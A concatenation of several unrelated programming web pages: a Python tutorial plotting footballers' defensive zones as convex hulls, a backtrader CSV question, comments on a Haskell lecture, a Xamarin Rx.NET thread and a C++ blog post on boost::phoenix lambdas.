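The vertices and simplices attributes are exactly what the plotting code below iterates over.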
Let’s start by plotting all 7 event locations as dots on a scatter chart:
#Plot the X & Y location with dots
plt.plot(player50471.x, player50471.y, 'o')
[<matplotlib.lines.Line2D at 0x1faa2d10908>]
Next up, we’re going to add lines around the most extreme parts of the plot. These most extreme parts are stored in a part of the hull object called simplices. We can just use a for loop to iterate through the simplices and draw lines between them:
for simplex in hull.simplices:
    plt.plot(defpoints[simplex, 0], defpoints[simplex, 1], 'k-')
Looks kind of abstract, but a lot more interesting than the hull object on its own!
Let’s just add in some shading to make our area even clearer. We’ll also set it to 30% opacity with the alpha argument:
#Plot the dots and hull lines as before
plt.plot(player50471.x, player50471.y, 'o')
for simplex in hull.simplices:
    plt.plot(defpoints[simplex, 0], defpoints[simplex, 1], 'k-')

#Fill the area within the lines that we have drawn
plt.fill(defpoints[hull.vertices,0], defpoints[hull.vertices,1], 'k', alpha=0.3)
[<matplotlib.patches.Polygon at 0x1faa2f1bb70>]
Perfect, we have one player’s zone of defensive actions plotted. We don’t have a pitch or any other players on there yet, but this is great work!
Let’s work on a bigger project now – let’s do all of this over and over for a whole team. We’ll take a single team out of our dataset, then use for loops to create the plot for each player (exactly as above) before plotting them together.
First up, let’s extract Team B into one dataframe:
TeamB = defdata.loc[(defdata.team == "Team B")]
TeamB.head()
Perfect, just as before, but with different players on a single team.
We’ll now need to go through each player and do exactly what we did to plot just a single player. First up, we need to find out who we are dealing with. We can use .unique() to pool each individual into the variable ‘players’:
players = TeamB["player"].unique()
players
array([42593, 17476, 57112, 27789, 14664, 61366, 37748, 57001, 28554, 17740], dtype=int64)
Every player now just needs to go into a for loop, where we’ll do exactly what we did before to get a plot. We’ll create a temporary dataframe for each player, create a hull from the x/y coordinates, then plot the lines and fill in the shape with a transparent colour. Let’s take a look with the help of some comments:
#For each player in our players variable
for player in players:
    #Create a new dataframe for the player
    df = TeamB[(TeamB.player == player)]

    #Create an array of the x/y coordinate groups
    points = df[['x', 'y']].values

    #If there are enough points for a hull, create it. If there's an error, forget about it
    try:
        hull = ConvexHull(df[['x','y']])
    except:
        pass

    #If we created the hull, draw the lines and fill with 5%-opacity red. If there's an error, forget about it
    try:
        for simplex in hull.simplices:
            plt.plot(points[simplex, 0], points[simplex, 1], 'k-')
        plt.fill(points[hull.vertices,0], points[hull.vertices,1], 'red', alpha=0.05)
    except:
        pass

#Once all of the individual hulls have been created, plot them together
plt.show()
Fantastic work! We now have all of the players with enough data points on the chart. The transparency is a nice touch, as we can see any hidden players and where any crossover happens.
Our plot leaves out any players with fewer than three defensive actions in the data (a hull needs at least three points), so you may want to plot these as lines or dots. If so, you should be able to figure out how to do this from the code already, or from our other visualisation tutorials.
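As a rough sketch of that dot-plotting idea (the mini dataframe and variable names here are made up to stand in for the data above), you could find the players with too few actions and plot their individual actions as dots:

```python
import pandas as pd
import matplotlib
matplotlib.use("Agg")  # assumption: render off-screen, no display needed
import matplotlib.pyplot as plt

# Hypothetical stand-in for the TeamB dataframe used above
TeamB = pd.DataFrame({
    "player": [1, 1, 1, 2, 2, 3],
    "x": [10.0, 20.0, 30.0, 40.0, 50.0, 60.0],
    "y": [5.0, 15.0, 25.0, 35.0, 45.0, 55.0],
})

# A hull needs at least 3 points, so find players with fewer actions
counts = TeamB.groupby("player").size()
sparse_players = counts[counts < 3].index.tolist()

# Plot those players' actions as plain dots instead of hulls
for player in sparse_players:
    df = TeamB[TeamB.player == player]
    plt.plot(df.x, df.y, 'o')
```

You could run this loop just before plt.show() so the dots land on the same chart as the hulls.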
As for next steps, you might want to plot this on a pitch (pitch drawing tutorial here):
So now we can see where our team are performing their defensive actions – although remember a few players are missing. In terms of analysis, does this suggest that this team defends better on the left? Or is it more likely that they faced a team that largely attacked on that side? Visualisation is just one small piece of any analysis!
Summary
In this tutorial, we have practiced filtering a dataframe by player or team, then using SciPy’s convex hull tool to create the data for plotting the smallest area that contains our datapoints.
Some nice extensions to this that you may want to play with include adding some annotations for player names, or changing colours for each player. Of course, these charts aren’t limited to defensive metrics – why not take a look at penalty area entry pass zones, or compare goalkeeper distributions? However you build on this work, show us what you’re achieving on Twitter @FC_Python!
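For the annotation idea, a minimal sketch (the player name and points here are invented, echoing the defpoints array earlier) could label each hull at the mean of its points:

```python
import numpy as np
import matplotlib
matplotlib.use("Agg")  # assumption: render off-screen, no display needed
import matplotlib.pyplot as plt

# Hypothetical points for one player, like the defpoints array above
points = np.array([[38.9, 31.8], [30.0, 33.2], [64.7, 94.9],
                   [31.2, 32.2], [46.5, 22.6], [30.3, 49.8], [22.9, 92.5]])

# The mean of the points sits roughly in the middle of the hull,
# which makes a reasonable spot for a label
centre = points.mean(axis=0)
plt.annotate("Player 50471", xy=centre, ha="center")
```

Inside the team loop, the same two lines would label each player's hull in turn.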
Find further visualisation tutorials here!
https://fcpython.com/visualisation/convex-hulls-football-python
Newbie to backtrader - CSV Data feed
- Quy Bao Le last edited by
Hi all,
I tried to feed data from CSV but it didn't work
My CSV data is as below
My code is
import datetime
import backtrader.feeds as btfeeds
class MyOHLC(btfeeds.GenericCSVData):
params = (
('fromdate', datetime.datetime(2017, 12, 1)),
('todate', datetime.datetime(2017, 12, 31)),
('nullvalue', 0.0),
('dtformat', ('%Y-%m-%d')),
('tmformat', ('%H.%M.%S')),
('datetime', 1),
('open', 2),
('high', 3),
('low', 4),
('close', 5),
('volume', 6),
('openinterest', -1)
)
data = MyOHLC(dataname='E:\Data\HPG.csv')
print(data.getfeed())
The result is always None.
Somebody please help.
Thanks a lot
- Paska Houso last edited by
@quy-bao-le said in Newbie to backtrader - CSV Data feed:
('dtformat', ('%Y-%m-%d'))
To start with ... that format certainly won't match the (not fully displayed) datetime column, which has this format:
%Y%m%d and possibly more content after that.
To continue with:
An Excel table is not CSV. Your intention is clear, but it would be better if you showed the actual CSV data (a couple of lines suffice)
You can read the remark at the top ... and format your code easily (that will make it easier for others to read and help)
A complete sample (as small as possible) is always a lot more helpful than out of context snippets.
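To illustrate the format mismatch the reply points at, plain strptime shows why '%Y-%m-%d' fails against a compact date. (The sample value 20171201 is an assumption based on the described column, not taken from the poster's file.)

```python
from datetime import datetime

# '%Y-%m-%d' expects dashes, so a compact date like 20171201 won't parse
try:
    datetime.strptime("20171201", "%Y-%m-%d")
    dashed_format_matches = True
except ValueError:
    dashed_format_matches = False

# '%Y%m%d' matches the compact layout
parsed = datetime.strptime("20171201", "%Y%m%d")
```

If that is indeed the column's layout, setting ('dtformat', '%Y%m%d') in the params tuple would be the corresponding fix.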
https://community.backtrader.com/topic/799/newbie-to-backtrader-csv-data-feed
C9 Lectures: Dr. Erik Meijer - Functional Programming Fundamentals, Chapter 3 of 13
- Posted: Oct 15, 2009 at 8:46AM
- 87,360 views
- 54 comments
In Chapter 3, Dr. Meijer explores types and classes in Haskell. A type is a collection of related values, and in Haskell every well-formed expression has a type. Using type inference, these types are calculated automatically at compile time. If evaluating expression e produces a value of type t, then e has type t, written e :: t. A function is a mapping of values of one type to values of another type, and you will learn about new kinds of functions in this lecture, specifically curried functions – functions that return functions as a result (and functions are values, remember) – and polymorphic functions (functions whose type contains one or more type variables). - Excellent series so far. Also, Learn You a Haskell for Great Good is an excellent reference source for some of this material. Thanks again Dr. Meijer.
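As a rough illustration of the currying idea in a more familiar imperative setting (the names here are invented for the sketch, not taken from the lecture), a Python function can return a function that is still waiting for its next argument:

```python
# add is "curried": it takes x and returns a new function that
# waits for y, so a function is being returned as a value
def add(x):
    def add_x(y):
        return x + y
    return add_x

add_five = add(5)    # partial application: fix the first argument
total = add_five(3)  # supply the second argument later
```

Haskell does this for every multi-argument function automatically; the sketch just makes the mechanics explicit.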
Some might like my Haskell Cheatsheet at. It's a short reference & mini-tutorial.
OK - done pimping now
Justin
Well it's the good kind of pimping and that is a nice cheat sheet. I will definitely reference it when my memory fails to remember some construct that I know would be simple in the first place
Excellent! I was looking forward to the next lecture.
I like the syntactic symmetry of inverse associativity for function declarations and function applications.
So the parentheses become denser at the left or the right.
The zip function is quite beautiful and metaphoric. Erik's definition
is super-symmetrical*. But then there is something nagging me (just a little bit) - here currying is suddenly not as pretty anymore because it breaks the symmetry, which is the motivation for Erik's own definition. 3 notions of structure: curried function (function to function to sequence), list (homogeneous unbounded sequence) and tuple (heterogeneous bounded sequence).
I assume curried functions can be treated as sequences as well - flipping and reversing arguments. And lazily (always here), so no time is wasted while just doing what I think Erik refers to as symbol pushing. Must see...
The book has not arrived yet, still waiting. That's not unusual, but hopefully it will arrive before the end of the lecture series.
* Sometimes (especially functional) programming language design looks like the search for a unified theory of everything - for computation, types and syntax. Slowly crawling closer and closer to nirvana. Haskell looks like the closest thing so far, although maybe still susceptible to decades of further axiomatization.
This episode is so full of Funk it could do with a 70's porno music track.
Last time Erik mentioned his hope about an interactive app with C# code. There is one actually available: LINQPad.net
Justin, Thanks for the cheatsheet..
One question about this:
or
I typed those in Hugs and they are not recognized syntax. Are those just descriptions of a function?
By the way, is there any way to get descriptions like the ones above for a predefined function such as zip?
The complete Hugs is 14MB while GHC is 50MB. Does the size difference reflect better features?
You can type things like
in Hugs or GHCi and it will work. Hugs and GHCi are interpreters that expect expressions, which they'll gladly evaluate and print.
However, when you type something like
in Hugs or GHCi, you're asking it to evaluate the expression f and telling the interpreter it has type Int -> Int -> Int. There are several problems with this. First of all, the interpreter does not know what this "f" thing is you're talking about, unless you have defined f in a Haskell script and have loaded that script file. Secondly, if you did define f somewhere, functions themselves cannot be printed to the console.**
** Often the cryptic error thrown by the interpreters is something along the lines of "There is no Show instance for Int->Int->Int".
You can use ":t" to find the type of something:
Prelude> :t zip
zip :: [a] -> [b] -> [(a, b)]
Prelude>
For those who are interested, the C# zip function Erik talked about (shown below)...
...also exists in Haskell as zipWith
...and can be implemented using only two lines of Haskell.
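For readers following along without Haskell, here is a rough Python analogue of that zipWith behaviour. (This sketch is mine; it is not the two-line Haskell definition referred to above.)

```python
def zip_with(f, xs, ys):
    # Combine the lists pairwise with f, stopping at the shorter list,
    # which mirrors what Haskell's zipWith does
    return [f(x, y) for x, y in zip(xs, ys)]

# Pairwise addition, truncated at the shorter list
sums = zip_with(lambda a, b: a + b, [1, 2, 3], [10, 20])
```

With f as the tuple constructor, zip_with degenerates into plain zip, which is exactly the relationship between Haskell's zipWith and zip.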
Type-inference: An IDE idea
Suppose we had a Visual Haskell IDE. Then for any function definition, type-inference will kick in and dynamically derive the type from the function definition. That's nothing new.
Now imagine these two scenarios -
Scenario 1: While we are typing a definition, the IDE will assist by displaying a ghostly function type definition for our function above the function definition itself, as we go
Scenario 2: We start out by typing in the function type definition, then we lock-in the definition (context/lock definition). Then we go on to define the function itself. Here we are dynamically informed about mis/matching as we type while being able to see both the locked-in type of the function as well as the inferred type of the function.
First of all if we don't want to, we don't have to type the function type definition. When we are satisfied with a definition we can lock it in.
Then there's point vs point-free style. There the IDE will always normalize a function into a point-free style (good idea?) and then on the right show it in point style; or one can switch between point and point-free styles globally for a file (well, at least while we still keep the notion of a file).
Sounds like there are many interesting things a Haskell IDE could help with.
I don't think it's a good idea for the IDE to automatically transform a function into point-free notation. Sometimes the point-free version is much harder to read**. Nevertheless, it would be a great optional tool in an IDE.
** Example:
Btw, the pointfree version of this example can be made simpler if you use the commutativity of (*). The only problem is that the commutativity property is not guaranteed, so a (syntactic) pointfree tool cannot rely on it.
Nice. Thanks for your replies, @ShinNoNoir and @sylvan. By the way, here is an alternative I got:
This will open the source file in Vim (on my computer) and jump to the definition of zip.
I can't believe you're doing 13 of these. Fantastic.
This is the precise definition (abbreviated)
Now Erik mentions we don't have a tuple type, but in BCL 4 we now do, so it would not surprise me if we see this later on
Although I'm not sure it's so useful in C# when we have the "fusion zipper". Apropos, Erik, didn't you define IE<A> as A* in Cω? So then we could write this more succinctly as
And if C# had syntactic support for tuples, maybe we could even write something like
Or, now going completely mad
with pattern matching syntax in method signatures (tuple deconstruction).
Now why do we have to suffer with a block declaration if we just want a one-liner definition?
At this level the "reversed" signature (return type before argument type) also starts to grind a little (or even the fact that the types need be there at all).
Now we might as well just use Haskell...
Then of course the question becomes - now that we've also given IE special treatment, then what is the syntactic form of the semantic dual of A*?
Am I right that the Zip LINQ sequence operator in .NET 4.0 whose signature Erik wrote down actually corresponds to Haskell's zipWith function, not zip?
Without looking it up, using kind of my mental type inferencer, the type of zipWith would have to be, which is exactly the signature of .NET 4.0's Zip.
Actually, the new BCL zip (looking up) is
And the type of the Haskell zip (looking up) is
So the BCL definition is closer to Erik's super-symmetric version, except that it uses a constructor function rather than just returning tuples. Well... actually it's just as far away...
That's cool!
Actually it could use Brian's definition of simpler: shorter!
If the point-free style is shorter, then choose that, if not, then don't. Keep both side-by side for reference (left side the shortest; right side the longest - whichever form is whichever)
And yes, the point-transformer should use maximal type knowledge.
I can appreciate these lectures, but I think it would be nice if there was a series of lectures which dealt with beginners. I guess Erik is trying to convert the C# crowd by repeatedly bringing up references to it, but I think it would have been better had he presented the problems and then just showed how it is done in Haskell.
One drawback of having an Uber-Expert teach something like this is that things that seem trivial to them will only make sense (and therefore appeal) to "the initiated" .. that leaves beginners like me out.
I'm just checking Haskell out and was hoping I'd be able to learn something from these lectures but he is constantly delving into advanced material and constantly keeps comparing with C# ... I don't really know what the purpose of this series of lectures is. To compare and contrast C# vs Haskell or to elaborate on Functional Programming Fundamentals using Haskell?
I find Erik's teaching style a little haphazard and rather opaque from an outside learner's perspective. If the idea is to appeal to the Haskell initiates, then I guess the lectures are going well. Not all of us are super mathematicians waiting for the "triple curried function" manna to descend from the Redmond heaven... ROLLEYES
How about a little less pretentious, and a little more concrete? How about writing a little game? Like Tetris or something?
We'll figure out the Currying and the C# comparisons on our own thankyouvery much. [\RANT]
Thanks for the feedback.
The idea here is not to preach to the Haskell choir (obviously)... It's to teach imperative-minded programmers to think functionally, to understand how to program in a functional way, to understand that the future of programming will involve an increasingly functional style embedded inside imperative languages like C#.
Yes, you do need to understand currying. You do need to understand polymorphic functions, higher order functions, lazy evaluation, etc. It's awesome, in my mind, that Erik is including references to languages that most of you already program in as a way to hammer home the fundamentals. Doesn't that make sense in context?
This is not a Haskell 101 class. Haskell is the concrete language reference point used here ( it's a pure functional language so it forces the fundamentals to the top of your mind, then out of your fingers onto the keyboard -> you can do the exercises in it...).
C
I can only show you the door, you have to walk through it.
First off, I have the utmost respect for Dr. Meijer and I think he is a great "fundamentalist" evangelist for functional programming. For a long time, Haskell seemed too ivory tower to me and I didn't bother checking it out.
You know what made me take a serious look? A mario brothers clone ("nario") written in Haskell by a Japanese hacker.
video: & code here. So I've been looking at the LYaHfGG and the Haskell Books ... and I guess I was hoping these lectures would be more accessible but I guess not. Most talks on Haskell involve the high falootin' higher order this and monad vs monoid that .... I mean yeah, sure, that all is possible, but where are we supposed to go learn basic stuff? Especially when claims are made that FP is destined to replace Procedural programming etc (which it probably is).
Is anyone willing to come down from the mountain and teach us mere mortals? Or is Haskell for big-shot brainiacs, for the "real problems" out there? Because if so, isn't there the possibility that it will end up in Lisp-Lisp-Land?
Anyways, don't mind me. I'll shut up now.
> You know what made me take a serious look? A mario brothers clone ("nario") written in Haskell by a Japanese hacker.
That is indeed very impressive.
But to get the spirit of functional programming you have to learn to "understand" concepts such as currying, monads, ... It is really not that hard. Wax on, wax off. Wax on, wax, off. Wax on, wax off.
I think you're missing a great opportunity here. Please ask questions about all the things Erik is presenting that you don't understand. I bet you would get a lot of help in the forum. That would help a lot of people that might be having the same issues as you. Also, it would give Erik insight into which concepts are difficult to grasp and help him better present future chapters.
Another thing you can do is read the chapter of the book that Erik is going to present in advance. That way you know what's going to be covered. If you don't have the book, the slides are here:.
I hope this helps.
I think I get what reddit is saying, but I have the advantage of having worked with Haskell many moons ago, so the concepts are not new to me. The reason I can sympathise is that even though I can read Erik's homework questions and immediately know the answers, when I watch through the explanation I immediately try to think of a scenario it could apply to. So with the zip function, I couldn't think of a use for converting two lists to a list of tuples, as data is never precise enough to make a perfect match (maybe too many outer joins in SQL dealing with fuzzy logic). So with all that said, I think it could possibly help a subset of us if Erik could also include some quick examples of applying a function or two, to assist in the learning process. I think that is what reddit was alluding to with the small game comment.
Maybe it's just me, but I've programmed in so many languages now that comparing one to another to help learn the new one becomes information overload and I tune out. By seeing something in its own right, rather than as a reflection of something else, I find it easier to invent new things using it. E.g. I wrote recursion in C for my first assignment. Not because I understood what recursion was, but because it looked like the simplest, least-code way of solving the problem; and especially because it didn't core dump like my previous attempts.
Nice, but with .NET 4.0 this is actually even cleaner:
Not sure it's cleaner but it shows how to use it without having an overloaded Zip for tuples. And even shorter
I'll buy that for a dollar. Quite short, but I still want the overload.
Got my copy of Graham Hutton's Programming in Haskell yesterday and can't wait to put my nose into it.
Thanks a lot Dr. Meijer for this fantastic series!
btw: I love the lecture / chapter based format of this webcast series. Hope to see more webcasts like this in the future.
I don't think the criticism by reddit is quite fair - but the part that you mention - practical uses of certain more complex abstract functions is quite reasonable. And that doesn't imply that a game needs to be built to show it.
Erik compares and contrasts Haskell to what we already know (C#) so that we may better understand it - As he should! And he actually does this with respect despite his love for Haskell: arguing about the OO and the benefits of Intellisense and so on. And the same for F# which too is not fundamentalist like Haskell. But I find the laziness of Haskell liberating because I don't have to constantly worry about explicitly introducing it where needed. It remains to be seen how the purity will play out.
As for preaching to the choir: I personally have no prior practical experience with Haskell. It always looked too scary. But I am armed with an interest in functional programming and some playing around with ML and functional style C# and Javascript. This lecture definitely has helped pass the threshold into Haskell. I could have used this a couple of years ago.
So I say: the series is on track, possibly with one or two more practical examples thrown in here and there to kick-start the imagination.
Basic Mathematica and Haskell should be used in primary school to help prime kids for transferring mathematics directly to practical applications and as a learning tool for testing assumptions. Actually Haskell and Logo would be cool companions.
exoteric, I appreciate your comment and perhaps I could have worded my comment in a less belligerent way. I do have a few comments about your assertions:
"practical uses of certain more complex abstract functions is quite reasonable. And that doesn't imply that a game needs to be built to show it."
Yes, one would have to agree with the general spirit of the comment, but there is a time and place for teaching complex abstractions. Complex abstractions without a "hook" are useless from a pedagogical perspective because pretty soon you have no-one new to teach and the choir is already well versed in the black art of whatever-it-is-that-rings-your-collective-bell.
I don't think a game needs to be built, but maybe something concrete instead of "lists within lists within lists".. perhaps that is immediately accessible to some here, but for most people, it is better to sort of feel their way around a new paradigm, and Functional Programming _is_ a new paradigm especially for people whose brains have been "messed with" by languages like C or BASIC etc ...
So, that is what I was trying to get at, and at the root of it was a misplaced assertion that perhaps these lectures were for general consumption. Personally, I would love if someone would explain what that game is doing. For example, I looked at the code, and learned something new about "Data" and the "Deriving" part. So I went and looked it up in the Haskell documentation to see what exactly it does.
You see, when I have the hook, I'll do the leg-work. The "hook" is the concrete part. Something "I" (the proverbial outsider programmer/analyst, i.e. "non-Haskeller") can relate to. Something in the real world which I can anchor myself to and then start feeling around this new "elephant", trying to understand what it is. And I disagree that abstract comparisons between two language definitions (C# and Haskell) are somehow useful for the general population (or that they constitute this "hook" that I speak of.) The people who can be worthwhile contributors to Haskell (if that is a goal at all) are scattered within the technical community, and not necessarily within just the C# community. So to claim it is the right thing to do is going a bit far.
An average programmer (especially a C# programmer) moves bits around and does daily drudge-work and not necessarily spend his/her time philosophizing about higher order functions and how they could be used to optimize the inventory reports. So, it would be more helpful -- maybe not in this lecture series as this is "not Haskell 101" -- if an average daily problem encountered by a generic programmer/developer/ (dare I say Systems Admin?) was presented and then in every lecture the solution was built upon.
Again, Haskell appeals to me because it strives to be "pure" and is simpler to understand because it presents mathematical concepts without extra fluff or baggage. But I get the feeling that the "high priest" class (the alpha nerds .. not Mr. Meijer or Brian etc.) thinks that certain problems are worthy of their attention while the more pedestrian and mundane aspects of programming are kind of better left on the wayside as they're just not sexy enough to merit any serious intellectual effort in terms of teaching, even though, IMO, mundane things can get you started and then you can go on and spend more time on the hi-fi stuff... but you'd have to be "in the game" to do that. If you walked off because people insisted on teaching you currying (it's great! please don't get me wrong) and really esoteric stuff ... then I don't know if it is realistic to say that FP should be the premier mode of computing. It just won't happen and I don't think the revolution will come from the ranks of play-it-safe hordes of C# programmers. (no offense to play it safe C# programmers I'm sure you're great people to have a beer or two with).
Again, this is just what I think and I don't mean to hurt anyone's feelings.
Perception is a truth in itself. So if one perceives this lecture series as inaccessible then that is a truth. It may not be the truth for all people but it is for at least a non-empty set of people. I can only speak for myself saying that I can't perceive how it could start out much simpler than what it's done - but for sure: the earlier the practical examples are introduced, the better. Over 'n out.
(...Not quite: I don't agree with Charles that this is not a Haskell 101 class. It may be that teaching Haskell is not the purpose of the lecture series but is definitely a significant side-effect of it. And since Haskell has such a compact noiseless syntax it really is ideal for that. It's almost like you don't see the syntax, you only see the core semantics. And the semantics is exactly what you can reuse elsewhere.)
I loaded a Haskell file with the following code in Hugs:
double x = x + x
quad x = double (double x)
quadrup = double . double
If I try "quad 1.01" (without quotes), the correct result of 4.04 is returned but if I try "quadrup 1.01" (without quotes) hugs returns following error message.
ERROR - Cannot infer instance
*** Instance : Fractional Integer
*** Expression : quadrup 1.01
Hugs returns the following types for quad and quadrup.
Main> :type quad
quad :: Num a => a -> a
Main> :type quadrup
quadrup :: Integer -> Integer
Why does quadrup end up with type of Integer -> Integer instead of "Num a => a -> a" ?
You have hit a subtlety in the Haskell design: the monomorphism restriction. Because quadrup is defined point-free (it has no explicit argument), the compiler is not allowed to keep the overloaded Num constraint, and the constraint is defaulted to Integer. Giving quadrup an explicit signature, quadrup :: Num a => a -> a, restores the polymorphic type.
Ah, nice, I missed that one! It can infer up to 8 parameters. I wonder what happens when you use more, or try to zip a list of tuples to itself ....
Well, I found out ... VS2010 hangs and I had to kill it. Intellisense was getting slower and slower, and the type became huge in the tooltip. Eventually with every new line where you are inferring something else, it just locks up.
Took Haskell in school and these lectures are great refreshers.
Looking forward to lecture 4.
This is shaping up to be a very nice series. I probably missed it but are the slide decks somewhere? Occasionally a slide is only seen in the far view - and my eyes can't quite pick it up.
Thanks
The slides can be found here.
Awesome. Perhaps the hardest thing about working with Haskell is working without an IDE. Only now do I recognize how lazy I have become after 4 years of C# programming =)
Erik, could you please name the IDE you prefer for Haskell?
Actually: name the top IDE's for Haskell.
PS - looking forward to hearing about non-/termination. I see now that the book you previously recommended, which I hadn't started on yet, Introduction to functional programming using Haskell, does mention this undefined business - i.e. the bottom type.
Here is part of the homework:
Nice lecture, please keep up the good work!!!
It's great man.
I have the same problem in ghci.
What does work though is to type:
So you need to type the type definition and the function definition in one statement.
I think this is because you're using an interpreter instead of a compiler.
I'm a beginner myself so, my apologies if any of the terminology is incorrect.
-edit-
Apparently there are multiple pages of comments and this question has already been answered, oops
Erik, can you explain a little about the pseudo "for all" notation you mentioned - why would you use it, when would you not use it?
Will we get a video today?
Yes, you will!
C
Justin, that is one cool cheat sheet. Thanks!
Radu
See for instance
@DrErikMeijer: .NET has a Pair class; it's tucked away in the System.Web.UI namespace
I believe from the book or the video that classes, like types, are inferred.
For example, in exercise 2 the function double picks up a Num a class constraint on its argument; it's unclear whether it is inferred from the operator *, the number 2, or both.
How does it work, exactly?
Excellent series so far. As mentioned previously, I am looking forward to seeing a "real" haskell program.
I completely disagree with reddit that the contents of these early lectures are too high falootin'
I too am a beginner with functional programming, but I recognise that this is the basics, the easy stuff. I'm sure that watching a competent functional programmer write something 'concrete' would knock us beginners on our * and have us longing for content like this.
https://channel9.msdn.com/Series/C9-Lectures-Erik-Meijer-Functional-Programming-Fundamentals/C9-Lectures-Dr-Erik-Meijer-Functional-Programming-Fundamentals-Chapter-3-of-13?format=flash
I added the rx-main package to a WPF Workbook, but when I type 'using System.Reactive;', both autocompletion and the compiler fail to find the namespace. I tried my own NuGet package and it worked fine.
What am I missing here? What version of .NET is the WPF Workbook using?
Any idea why it doesn't work?
Submitted issue to
Thank you for filing a bug so that this is on our radar.
There are a lot of NuGet packages that don't work correctly yet. See.
Thanks for the reply. Just wanted to contribute with a test scenario and to be sure RxNET was under your radar.
Still doesn't work in 0.9.0
Today a new version of Rx.NET was released supporting .NET Core 1.0. It requires NuGet 2.12, while the version supported by 0.9.0 is 2.10.766.
The package is now called System.Reactive 3.0.0.
I tested version 1.0.0.0, released today, and I'm happy to say that it can finally add System.Reactive.* packages.
Unfortunately when I run:
I get the following message and nothing happens.
"warning CS4014: Because this call is not awaited, execution of the current method continues before the call is completed. Consider applying the 'await' operator to the result of the call."
If I await the observable, I get only the last value. This is the expected behavior for an awaited observable, but it would be interesting not to have to await it and to see all the returned values, just as LINQPad has been doing for a long time.
I got some help from Paul Betts that gave me this solution:
It shows all the values once the observable completes. It works, but it would be much nicer if you supported output from IObservable and showed the values as they become available.
Glad it works! IObservable support would certainly be a useful feature.
Any news on this? Has IObservable support been added in any of the recent versions?
https://forums.xamarin.com/discussion/comment/319174
|
C++ and functional programming idioms
If you’re curious like me, you’ve probably ventured at least once into the scary and mind-bending world of functional programming, come back, and told yourself: “It would be nice if I could do this or that in C++”. FP languages have been around for decades, but only recently have we started to see the adoption of some of their techniques in classical imperative languages, like higher-order functions, closures/lambda functions, currying and lazy evaluation. For example, JavaScript has supported closures since version 1.7 and C# since 3.0.
Seeing how useful these techniques are, it’s natural to want them in our favorite programming language. We’re already doing a bit of FP without knowing it, thanks to the standard library algorithms. Lots of them take functors/predicates as arguments, so they mimic fairly well the behavior of higher-order functions. Besides that, C++ has no built-in support for other idioms like lambda functions or closures, but we can achieve similar effects thanks to the lazy nature of templates and a technique known as “expression templates”. More on that technique in a future post…
To demonstrate my point, let’s take a small program that takes a string as input and returns the most frequent character. In the old classical C++ way, it could be implemented as follows:
#include <iostream>
#include <locale>
#include <map>
#include <string>

namespace {

char most_frequent_letter(const std::string &str)
{
    typedef std::map<char, unsigned int> char_counts_t;
    char_counts_t char_counts;

    for(std::string::const_iterator itr = str.begin(); itr != str.end(); ++itr)
        if(std::isalpha(*itr, std::locale()))
            ++char_counts[*itr];

    for(char_counts_t::const_iterator itr = char_counts.begin(); itr != char_counts.end(); ++itr)
        std::cout << itr->first << " => " << itr->second << std::endl;

    if(!char_counts.empty()) {
        char_counts_t::const_iterator highest_count = char_counts.begin();
        for(char_counts_t::const_iterator itr = ++char_counts.begin(); itr != char_counts.end(); ++itr)
            if(itr->second > highest_count->second)
                highest_count = itr;
        return highest_count->first;
    }

    return ' ';
}

}

int main(int argc, char *argv[])
{
    if(argc > 1) {
        std::string some_string = argv[1];
        std::cout << "The string is: " << some_string << "\n" << std::endl;
        std::cout << "The most frequent letter is: " << most_frequent_letter(some_string) << std::endl;
    }
    else
        std::cout << "Usage: " << argv[0] << " <string>" << std::endl;
}
So far so good; it works and does the job. We’re putting the characters in a map, using the character as the key and the count as the value. Then we print the content of the map and finally iterate through it to find the character with the highest value. The problems with this code are that we’re reinventing parts already in the standard library and that the code lacks expressiveness. Let’s see how the code could look if we used the standard algorithms.
namespace {

template <typename map_t>
struct map_filler
{
    typedef void result_type;

    map_filler(map_t &map): map_(map) { }

    template <typename T>
    result_type operator()(const T &t) const
    {
        if(std::isalpha(t, std::locale()))
            ++map_[t];
    }

private:
    map_t &map_;
};

struct pair_printer
{
    typedef void result_type;

    template <typename pair_t>
    result_type operator()(const pair_t &pair) const
    {
        std::cout << pair.first << " => " << pair.second << std::endl;
    }
};

struct pair_value_comparer
{
    typedef bool result_type;

    template <typename pair_t>
    result_type operator()(const pair_t &a, const pair_t &b)
    {
        return a.second < b.second;
    }
};

char most_frequent_letter(const std::string &str)
{
    typedef std::map<char, unsigned int> char_counts_t;
    char_counts_t char_counts;

    std::for_each(str.begin(), str.end(), map_filler<char_counts_t>(char_counts));
    std::for_each(char_counts.begin(), char_counts.end(), pair_printer());

    char_counts_t::const_iterator result = std::max_element(
        char_counts.begin(), char_counts.end(), pair_value_comparer());

    return (result != char_counts.end()) ? result->first : ' ';
}

}
Hmm… Okay… Let’s see: our “most_frequent_letter” function is now using the standard library algorithms. It does make the function clearer and way more expressive, but at the cost of around 40 lines of “support code”, which are in our case functors. Even when thinking in terms of reusability, the chance of needing that same support code in the future is small, if not nonexistent. What would we do in that case in an FP language? Use a small lambda function/closure instead. For this example, I’m going to use boost::phoenix 2.0, an efficient FP library that is part of boost, which is in my opinion the best general, multi-purpose C++ library and a must-have for any serious C++ programmer. Let’s see what phoenix can do:
namespace {

namespace phx = boost::phoenix;
using namespace phx::arg_names;
using namespace phx::local_names;
using phx::at_c;

char most_frequent_letter(const std::string &str)
{
    typedef std::map<char, unsigned int> char_counts_t;
    char_counts_t char_counts;

    std::for_each(str.begin(), str.end(),
        phx::if_(phx::bind(std::isalpha<char>, _1, phx::construct<std::locale>()))
        [
            phx::let(_a = phx::ref(char_counts)[_1])
            [
                ++_a
            ]
        ]);

    std::for_each(char_counts.begin(), char_counts.end(),
        std::cout << at_c<0>(_1) << " => " << at_c<1>(_1) << std::endl);

    char_counts_t::const_iterator result = std::max_element(
        char_counts.begin(), char_counts.end(), at_c<1>(_1) < at_c<1>(_2));

    return (result != char_counts.end()) ? result->first : ' ';
}

}
I made a few using statements to make the code easier to understand. Let’s take a look at the for_each statement: the first 2 arguments are the usual .begin() and .end(), but then you see that strange if_ as the third argument. if_, like every phoenix statement, returns a functor object created at compile time via template composition (expression templates). So with this library, you can create inline functors on the fly without the “support code” bloat. You can use your own functors as long as they’re lazy, which means they don’t do anything before operator() is called on them. Fortunately, the lib also provides wrappers for “normal” functions.
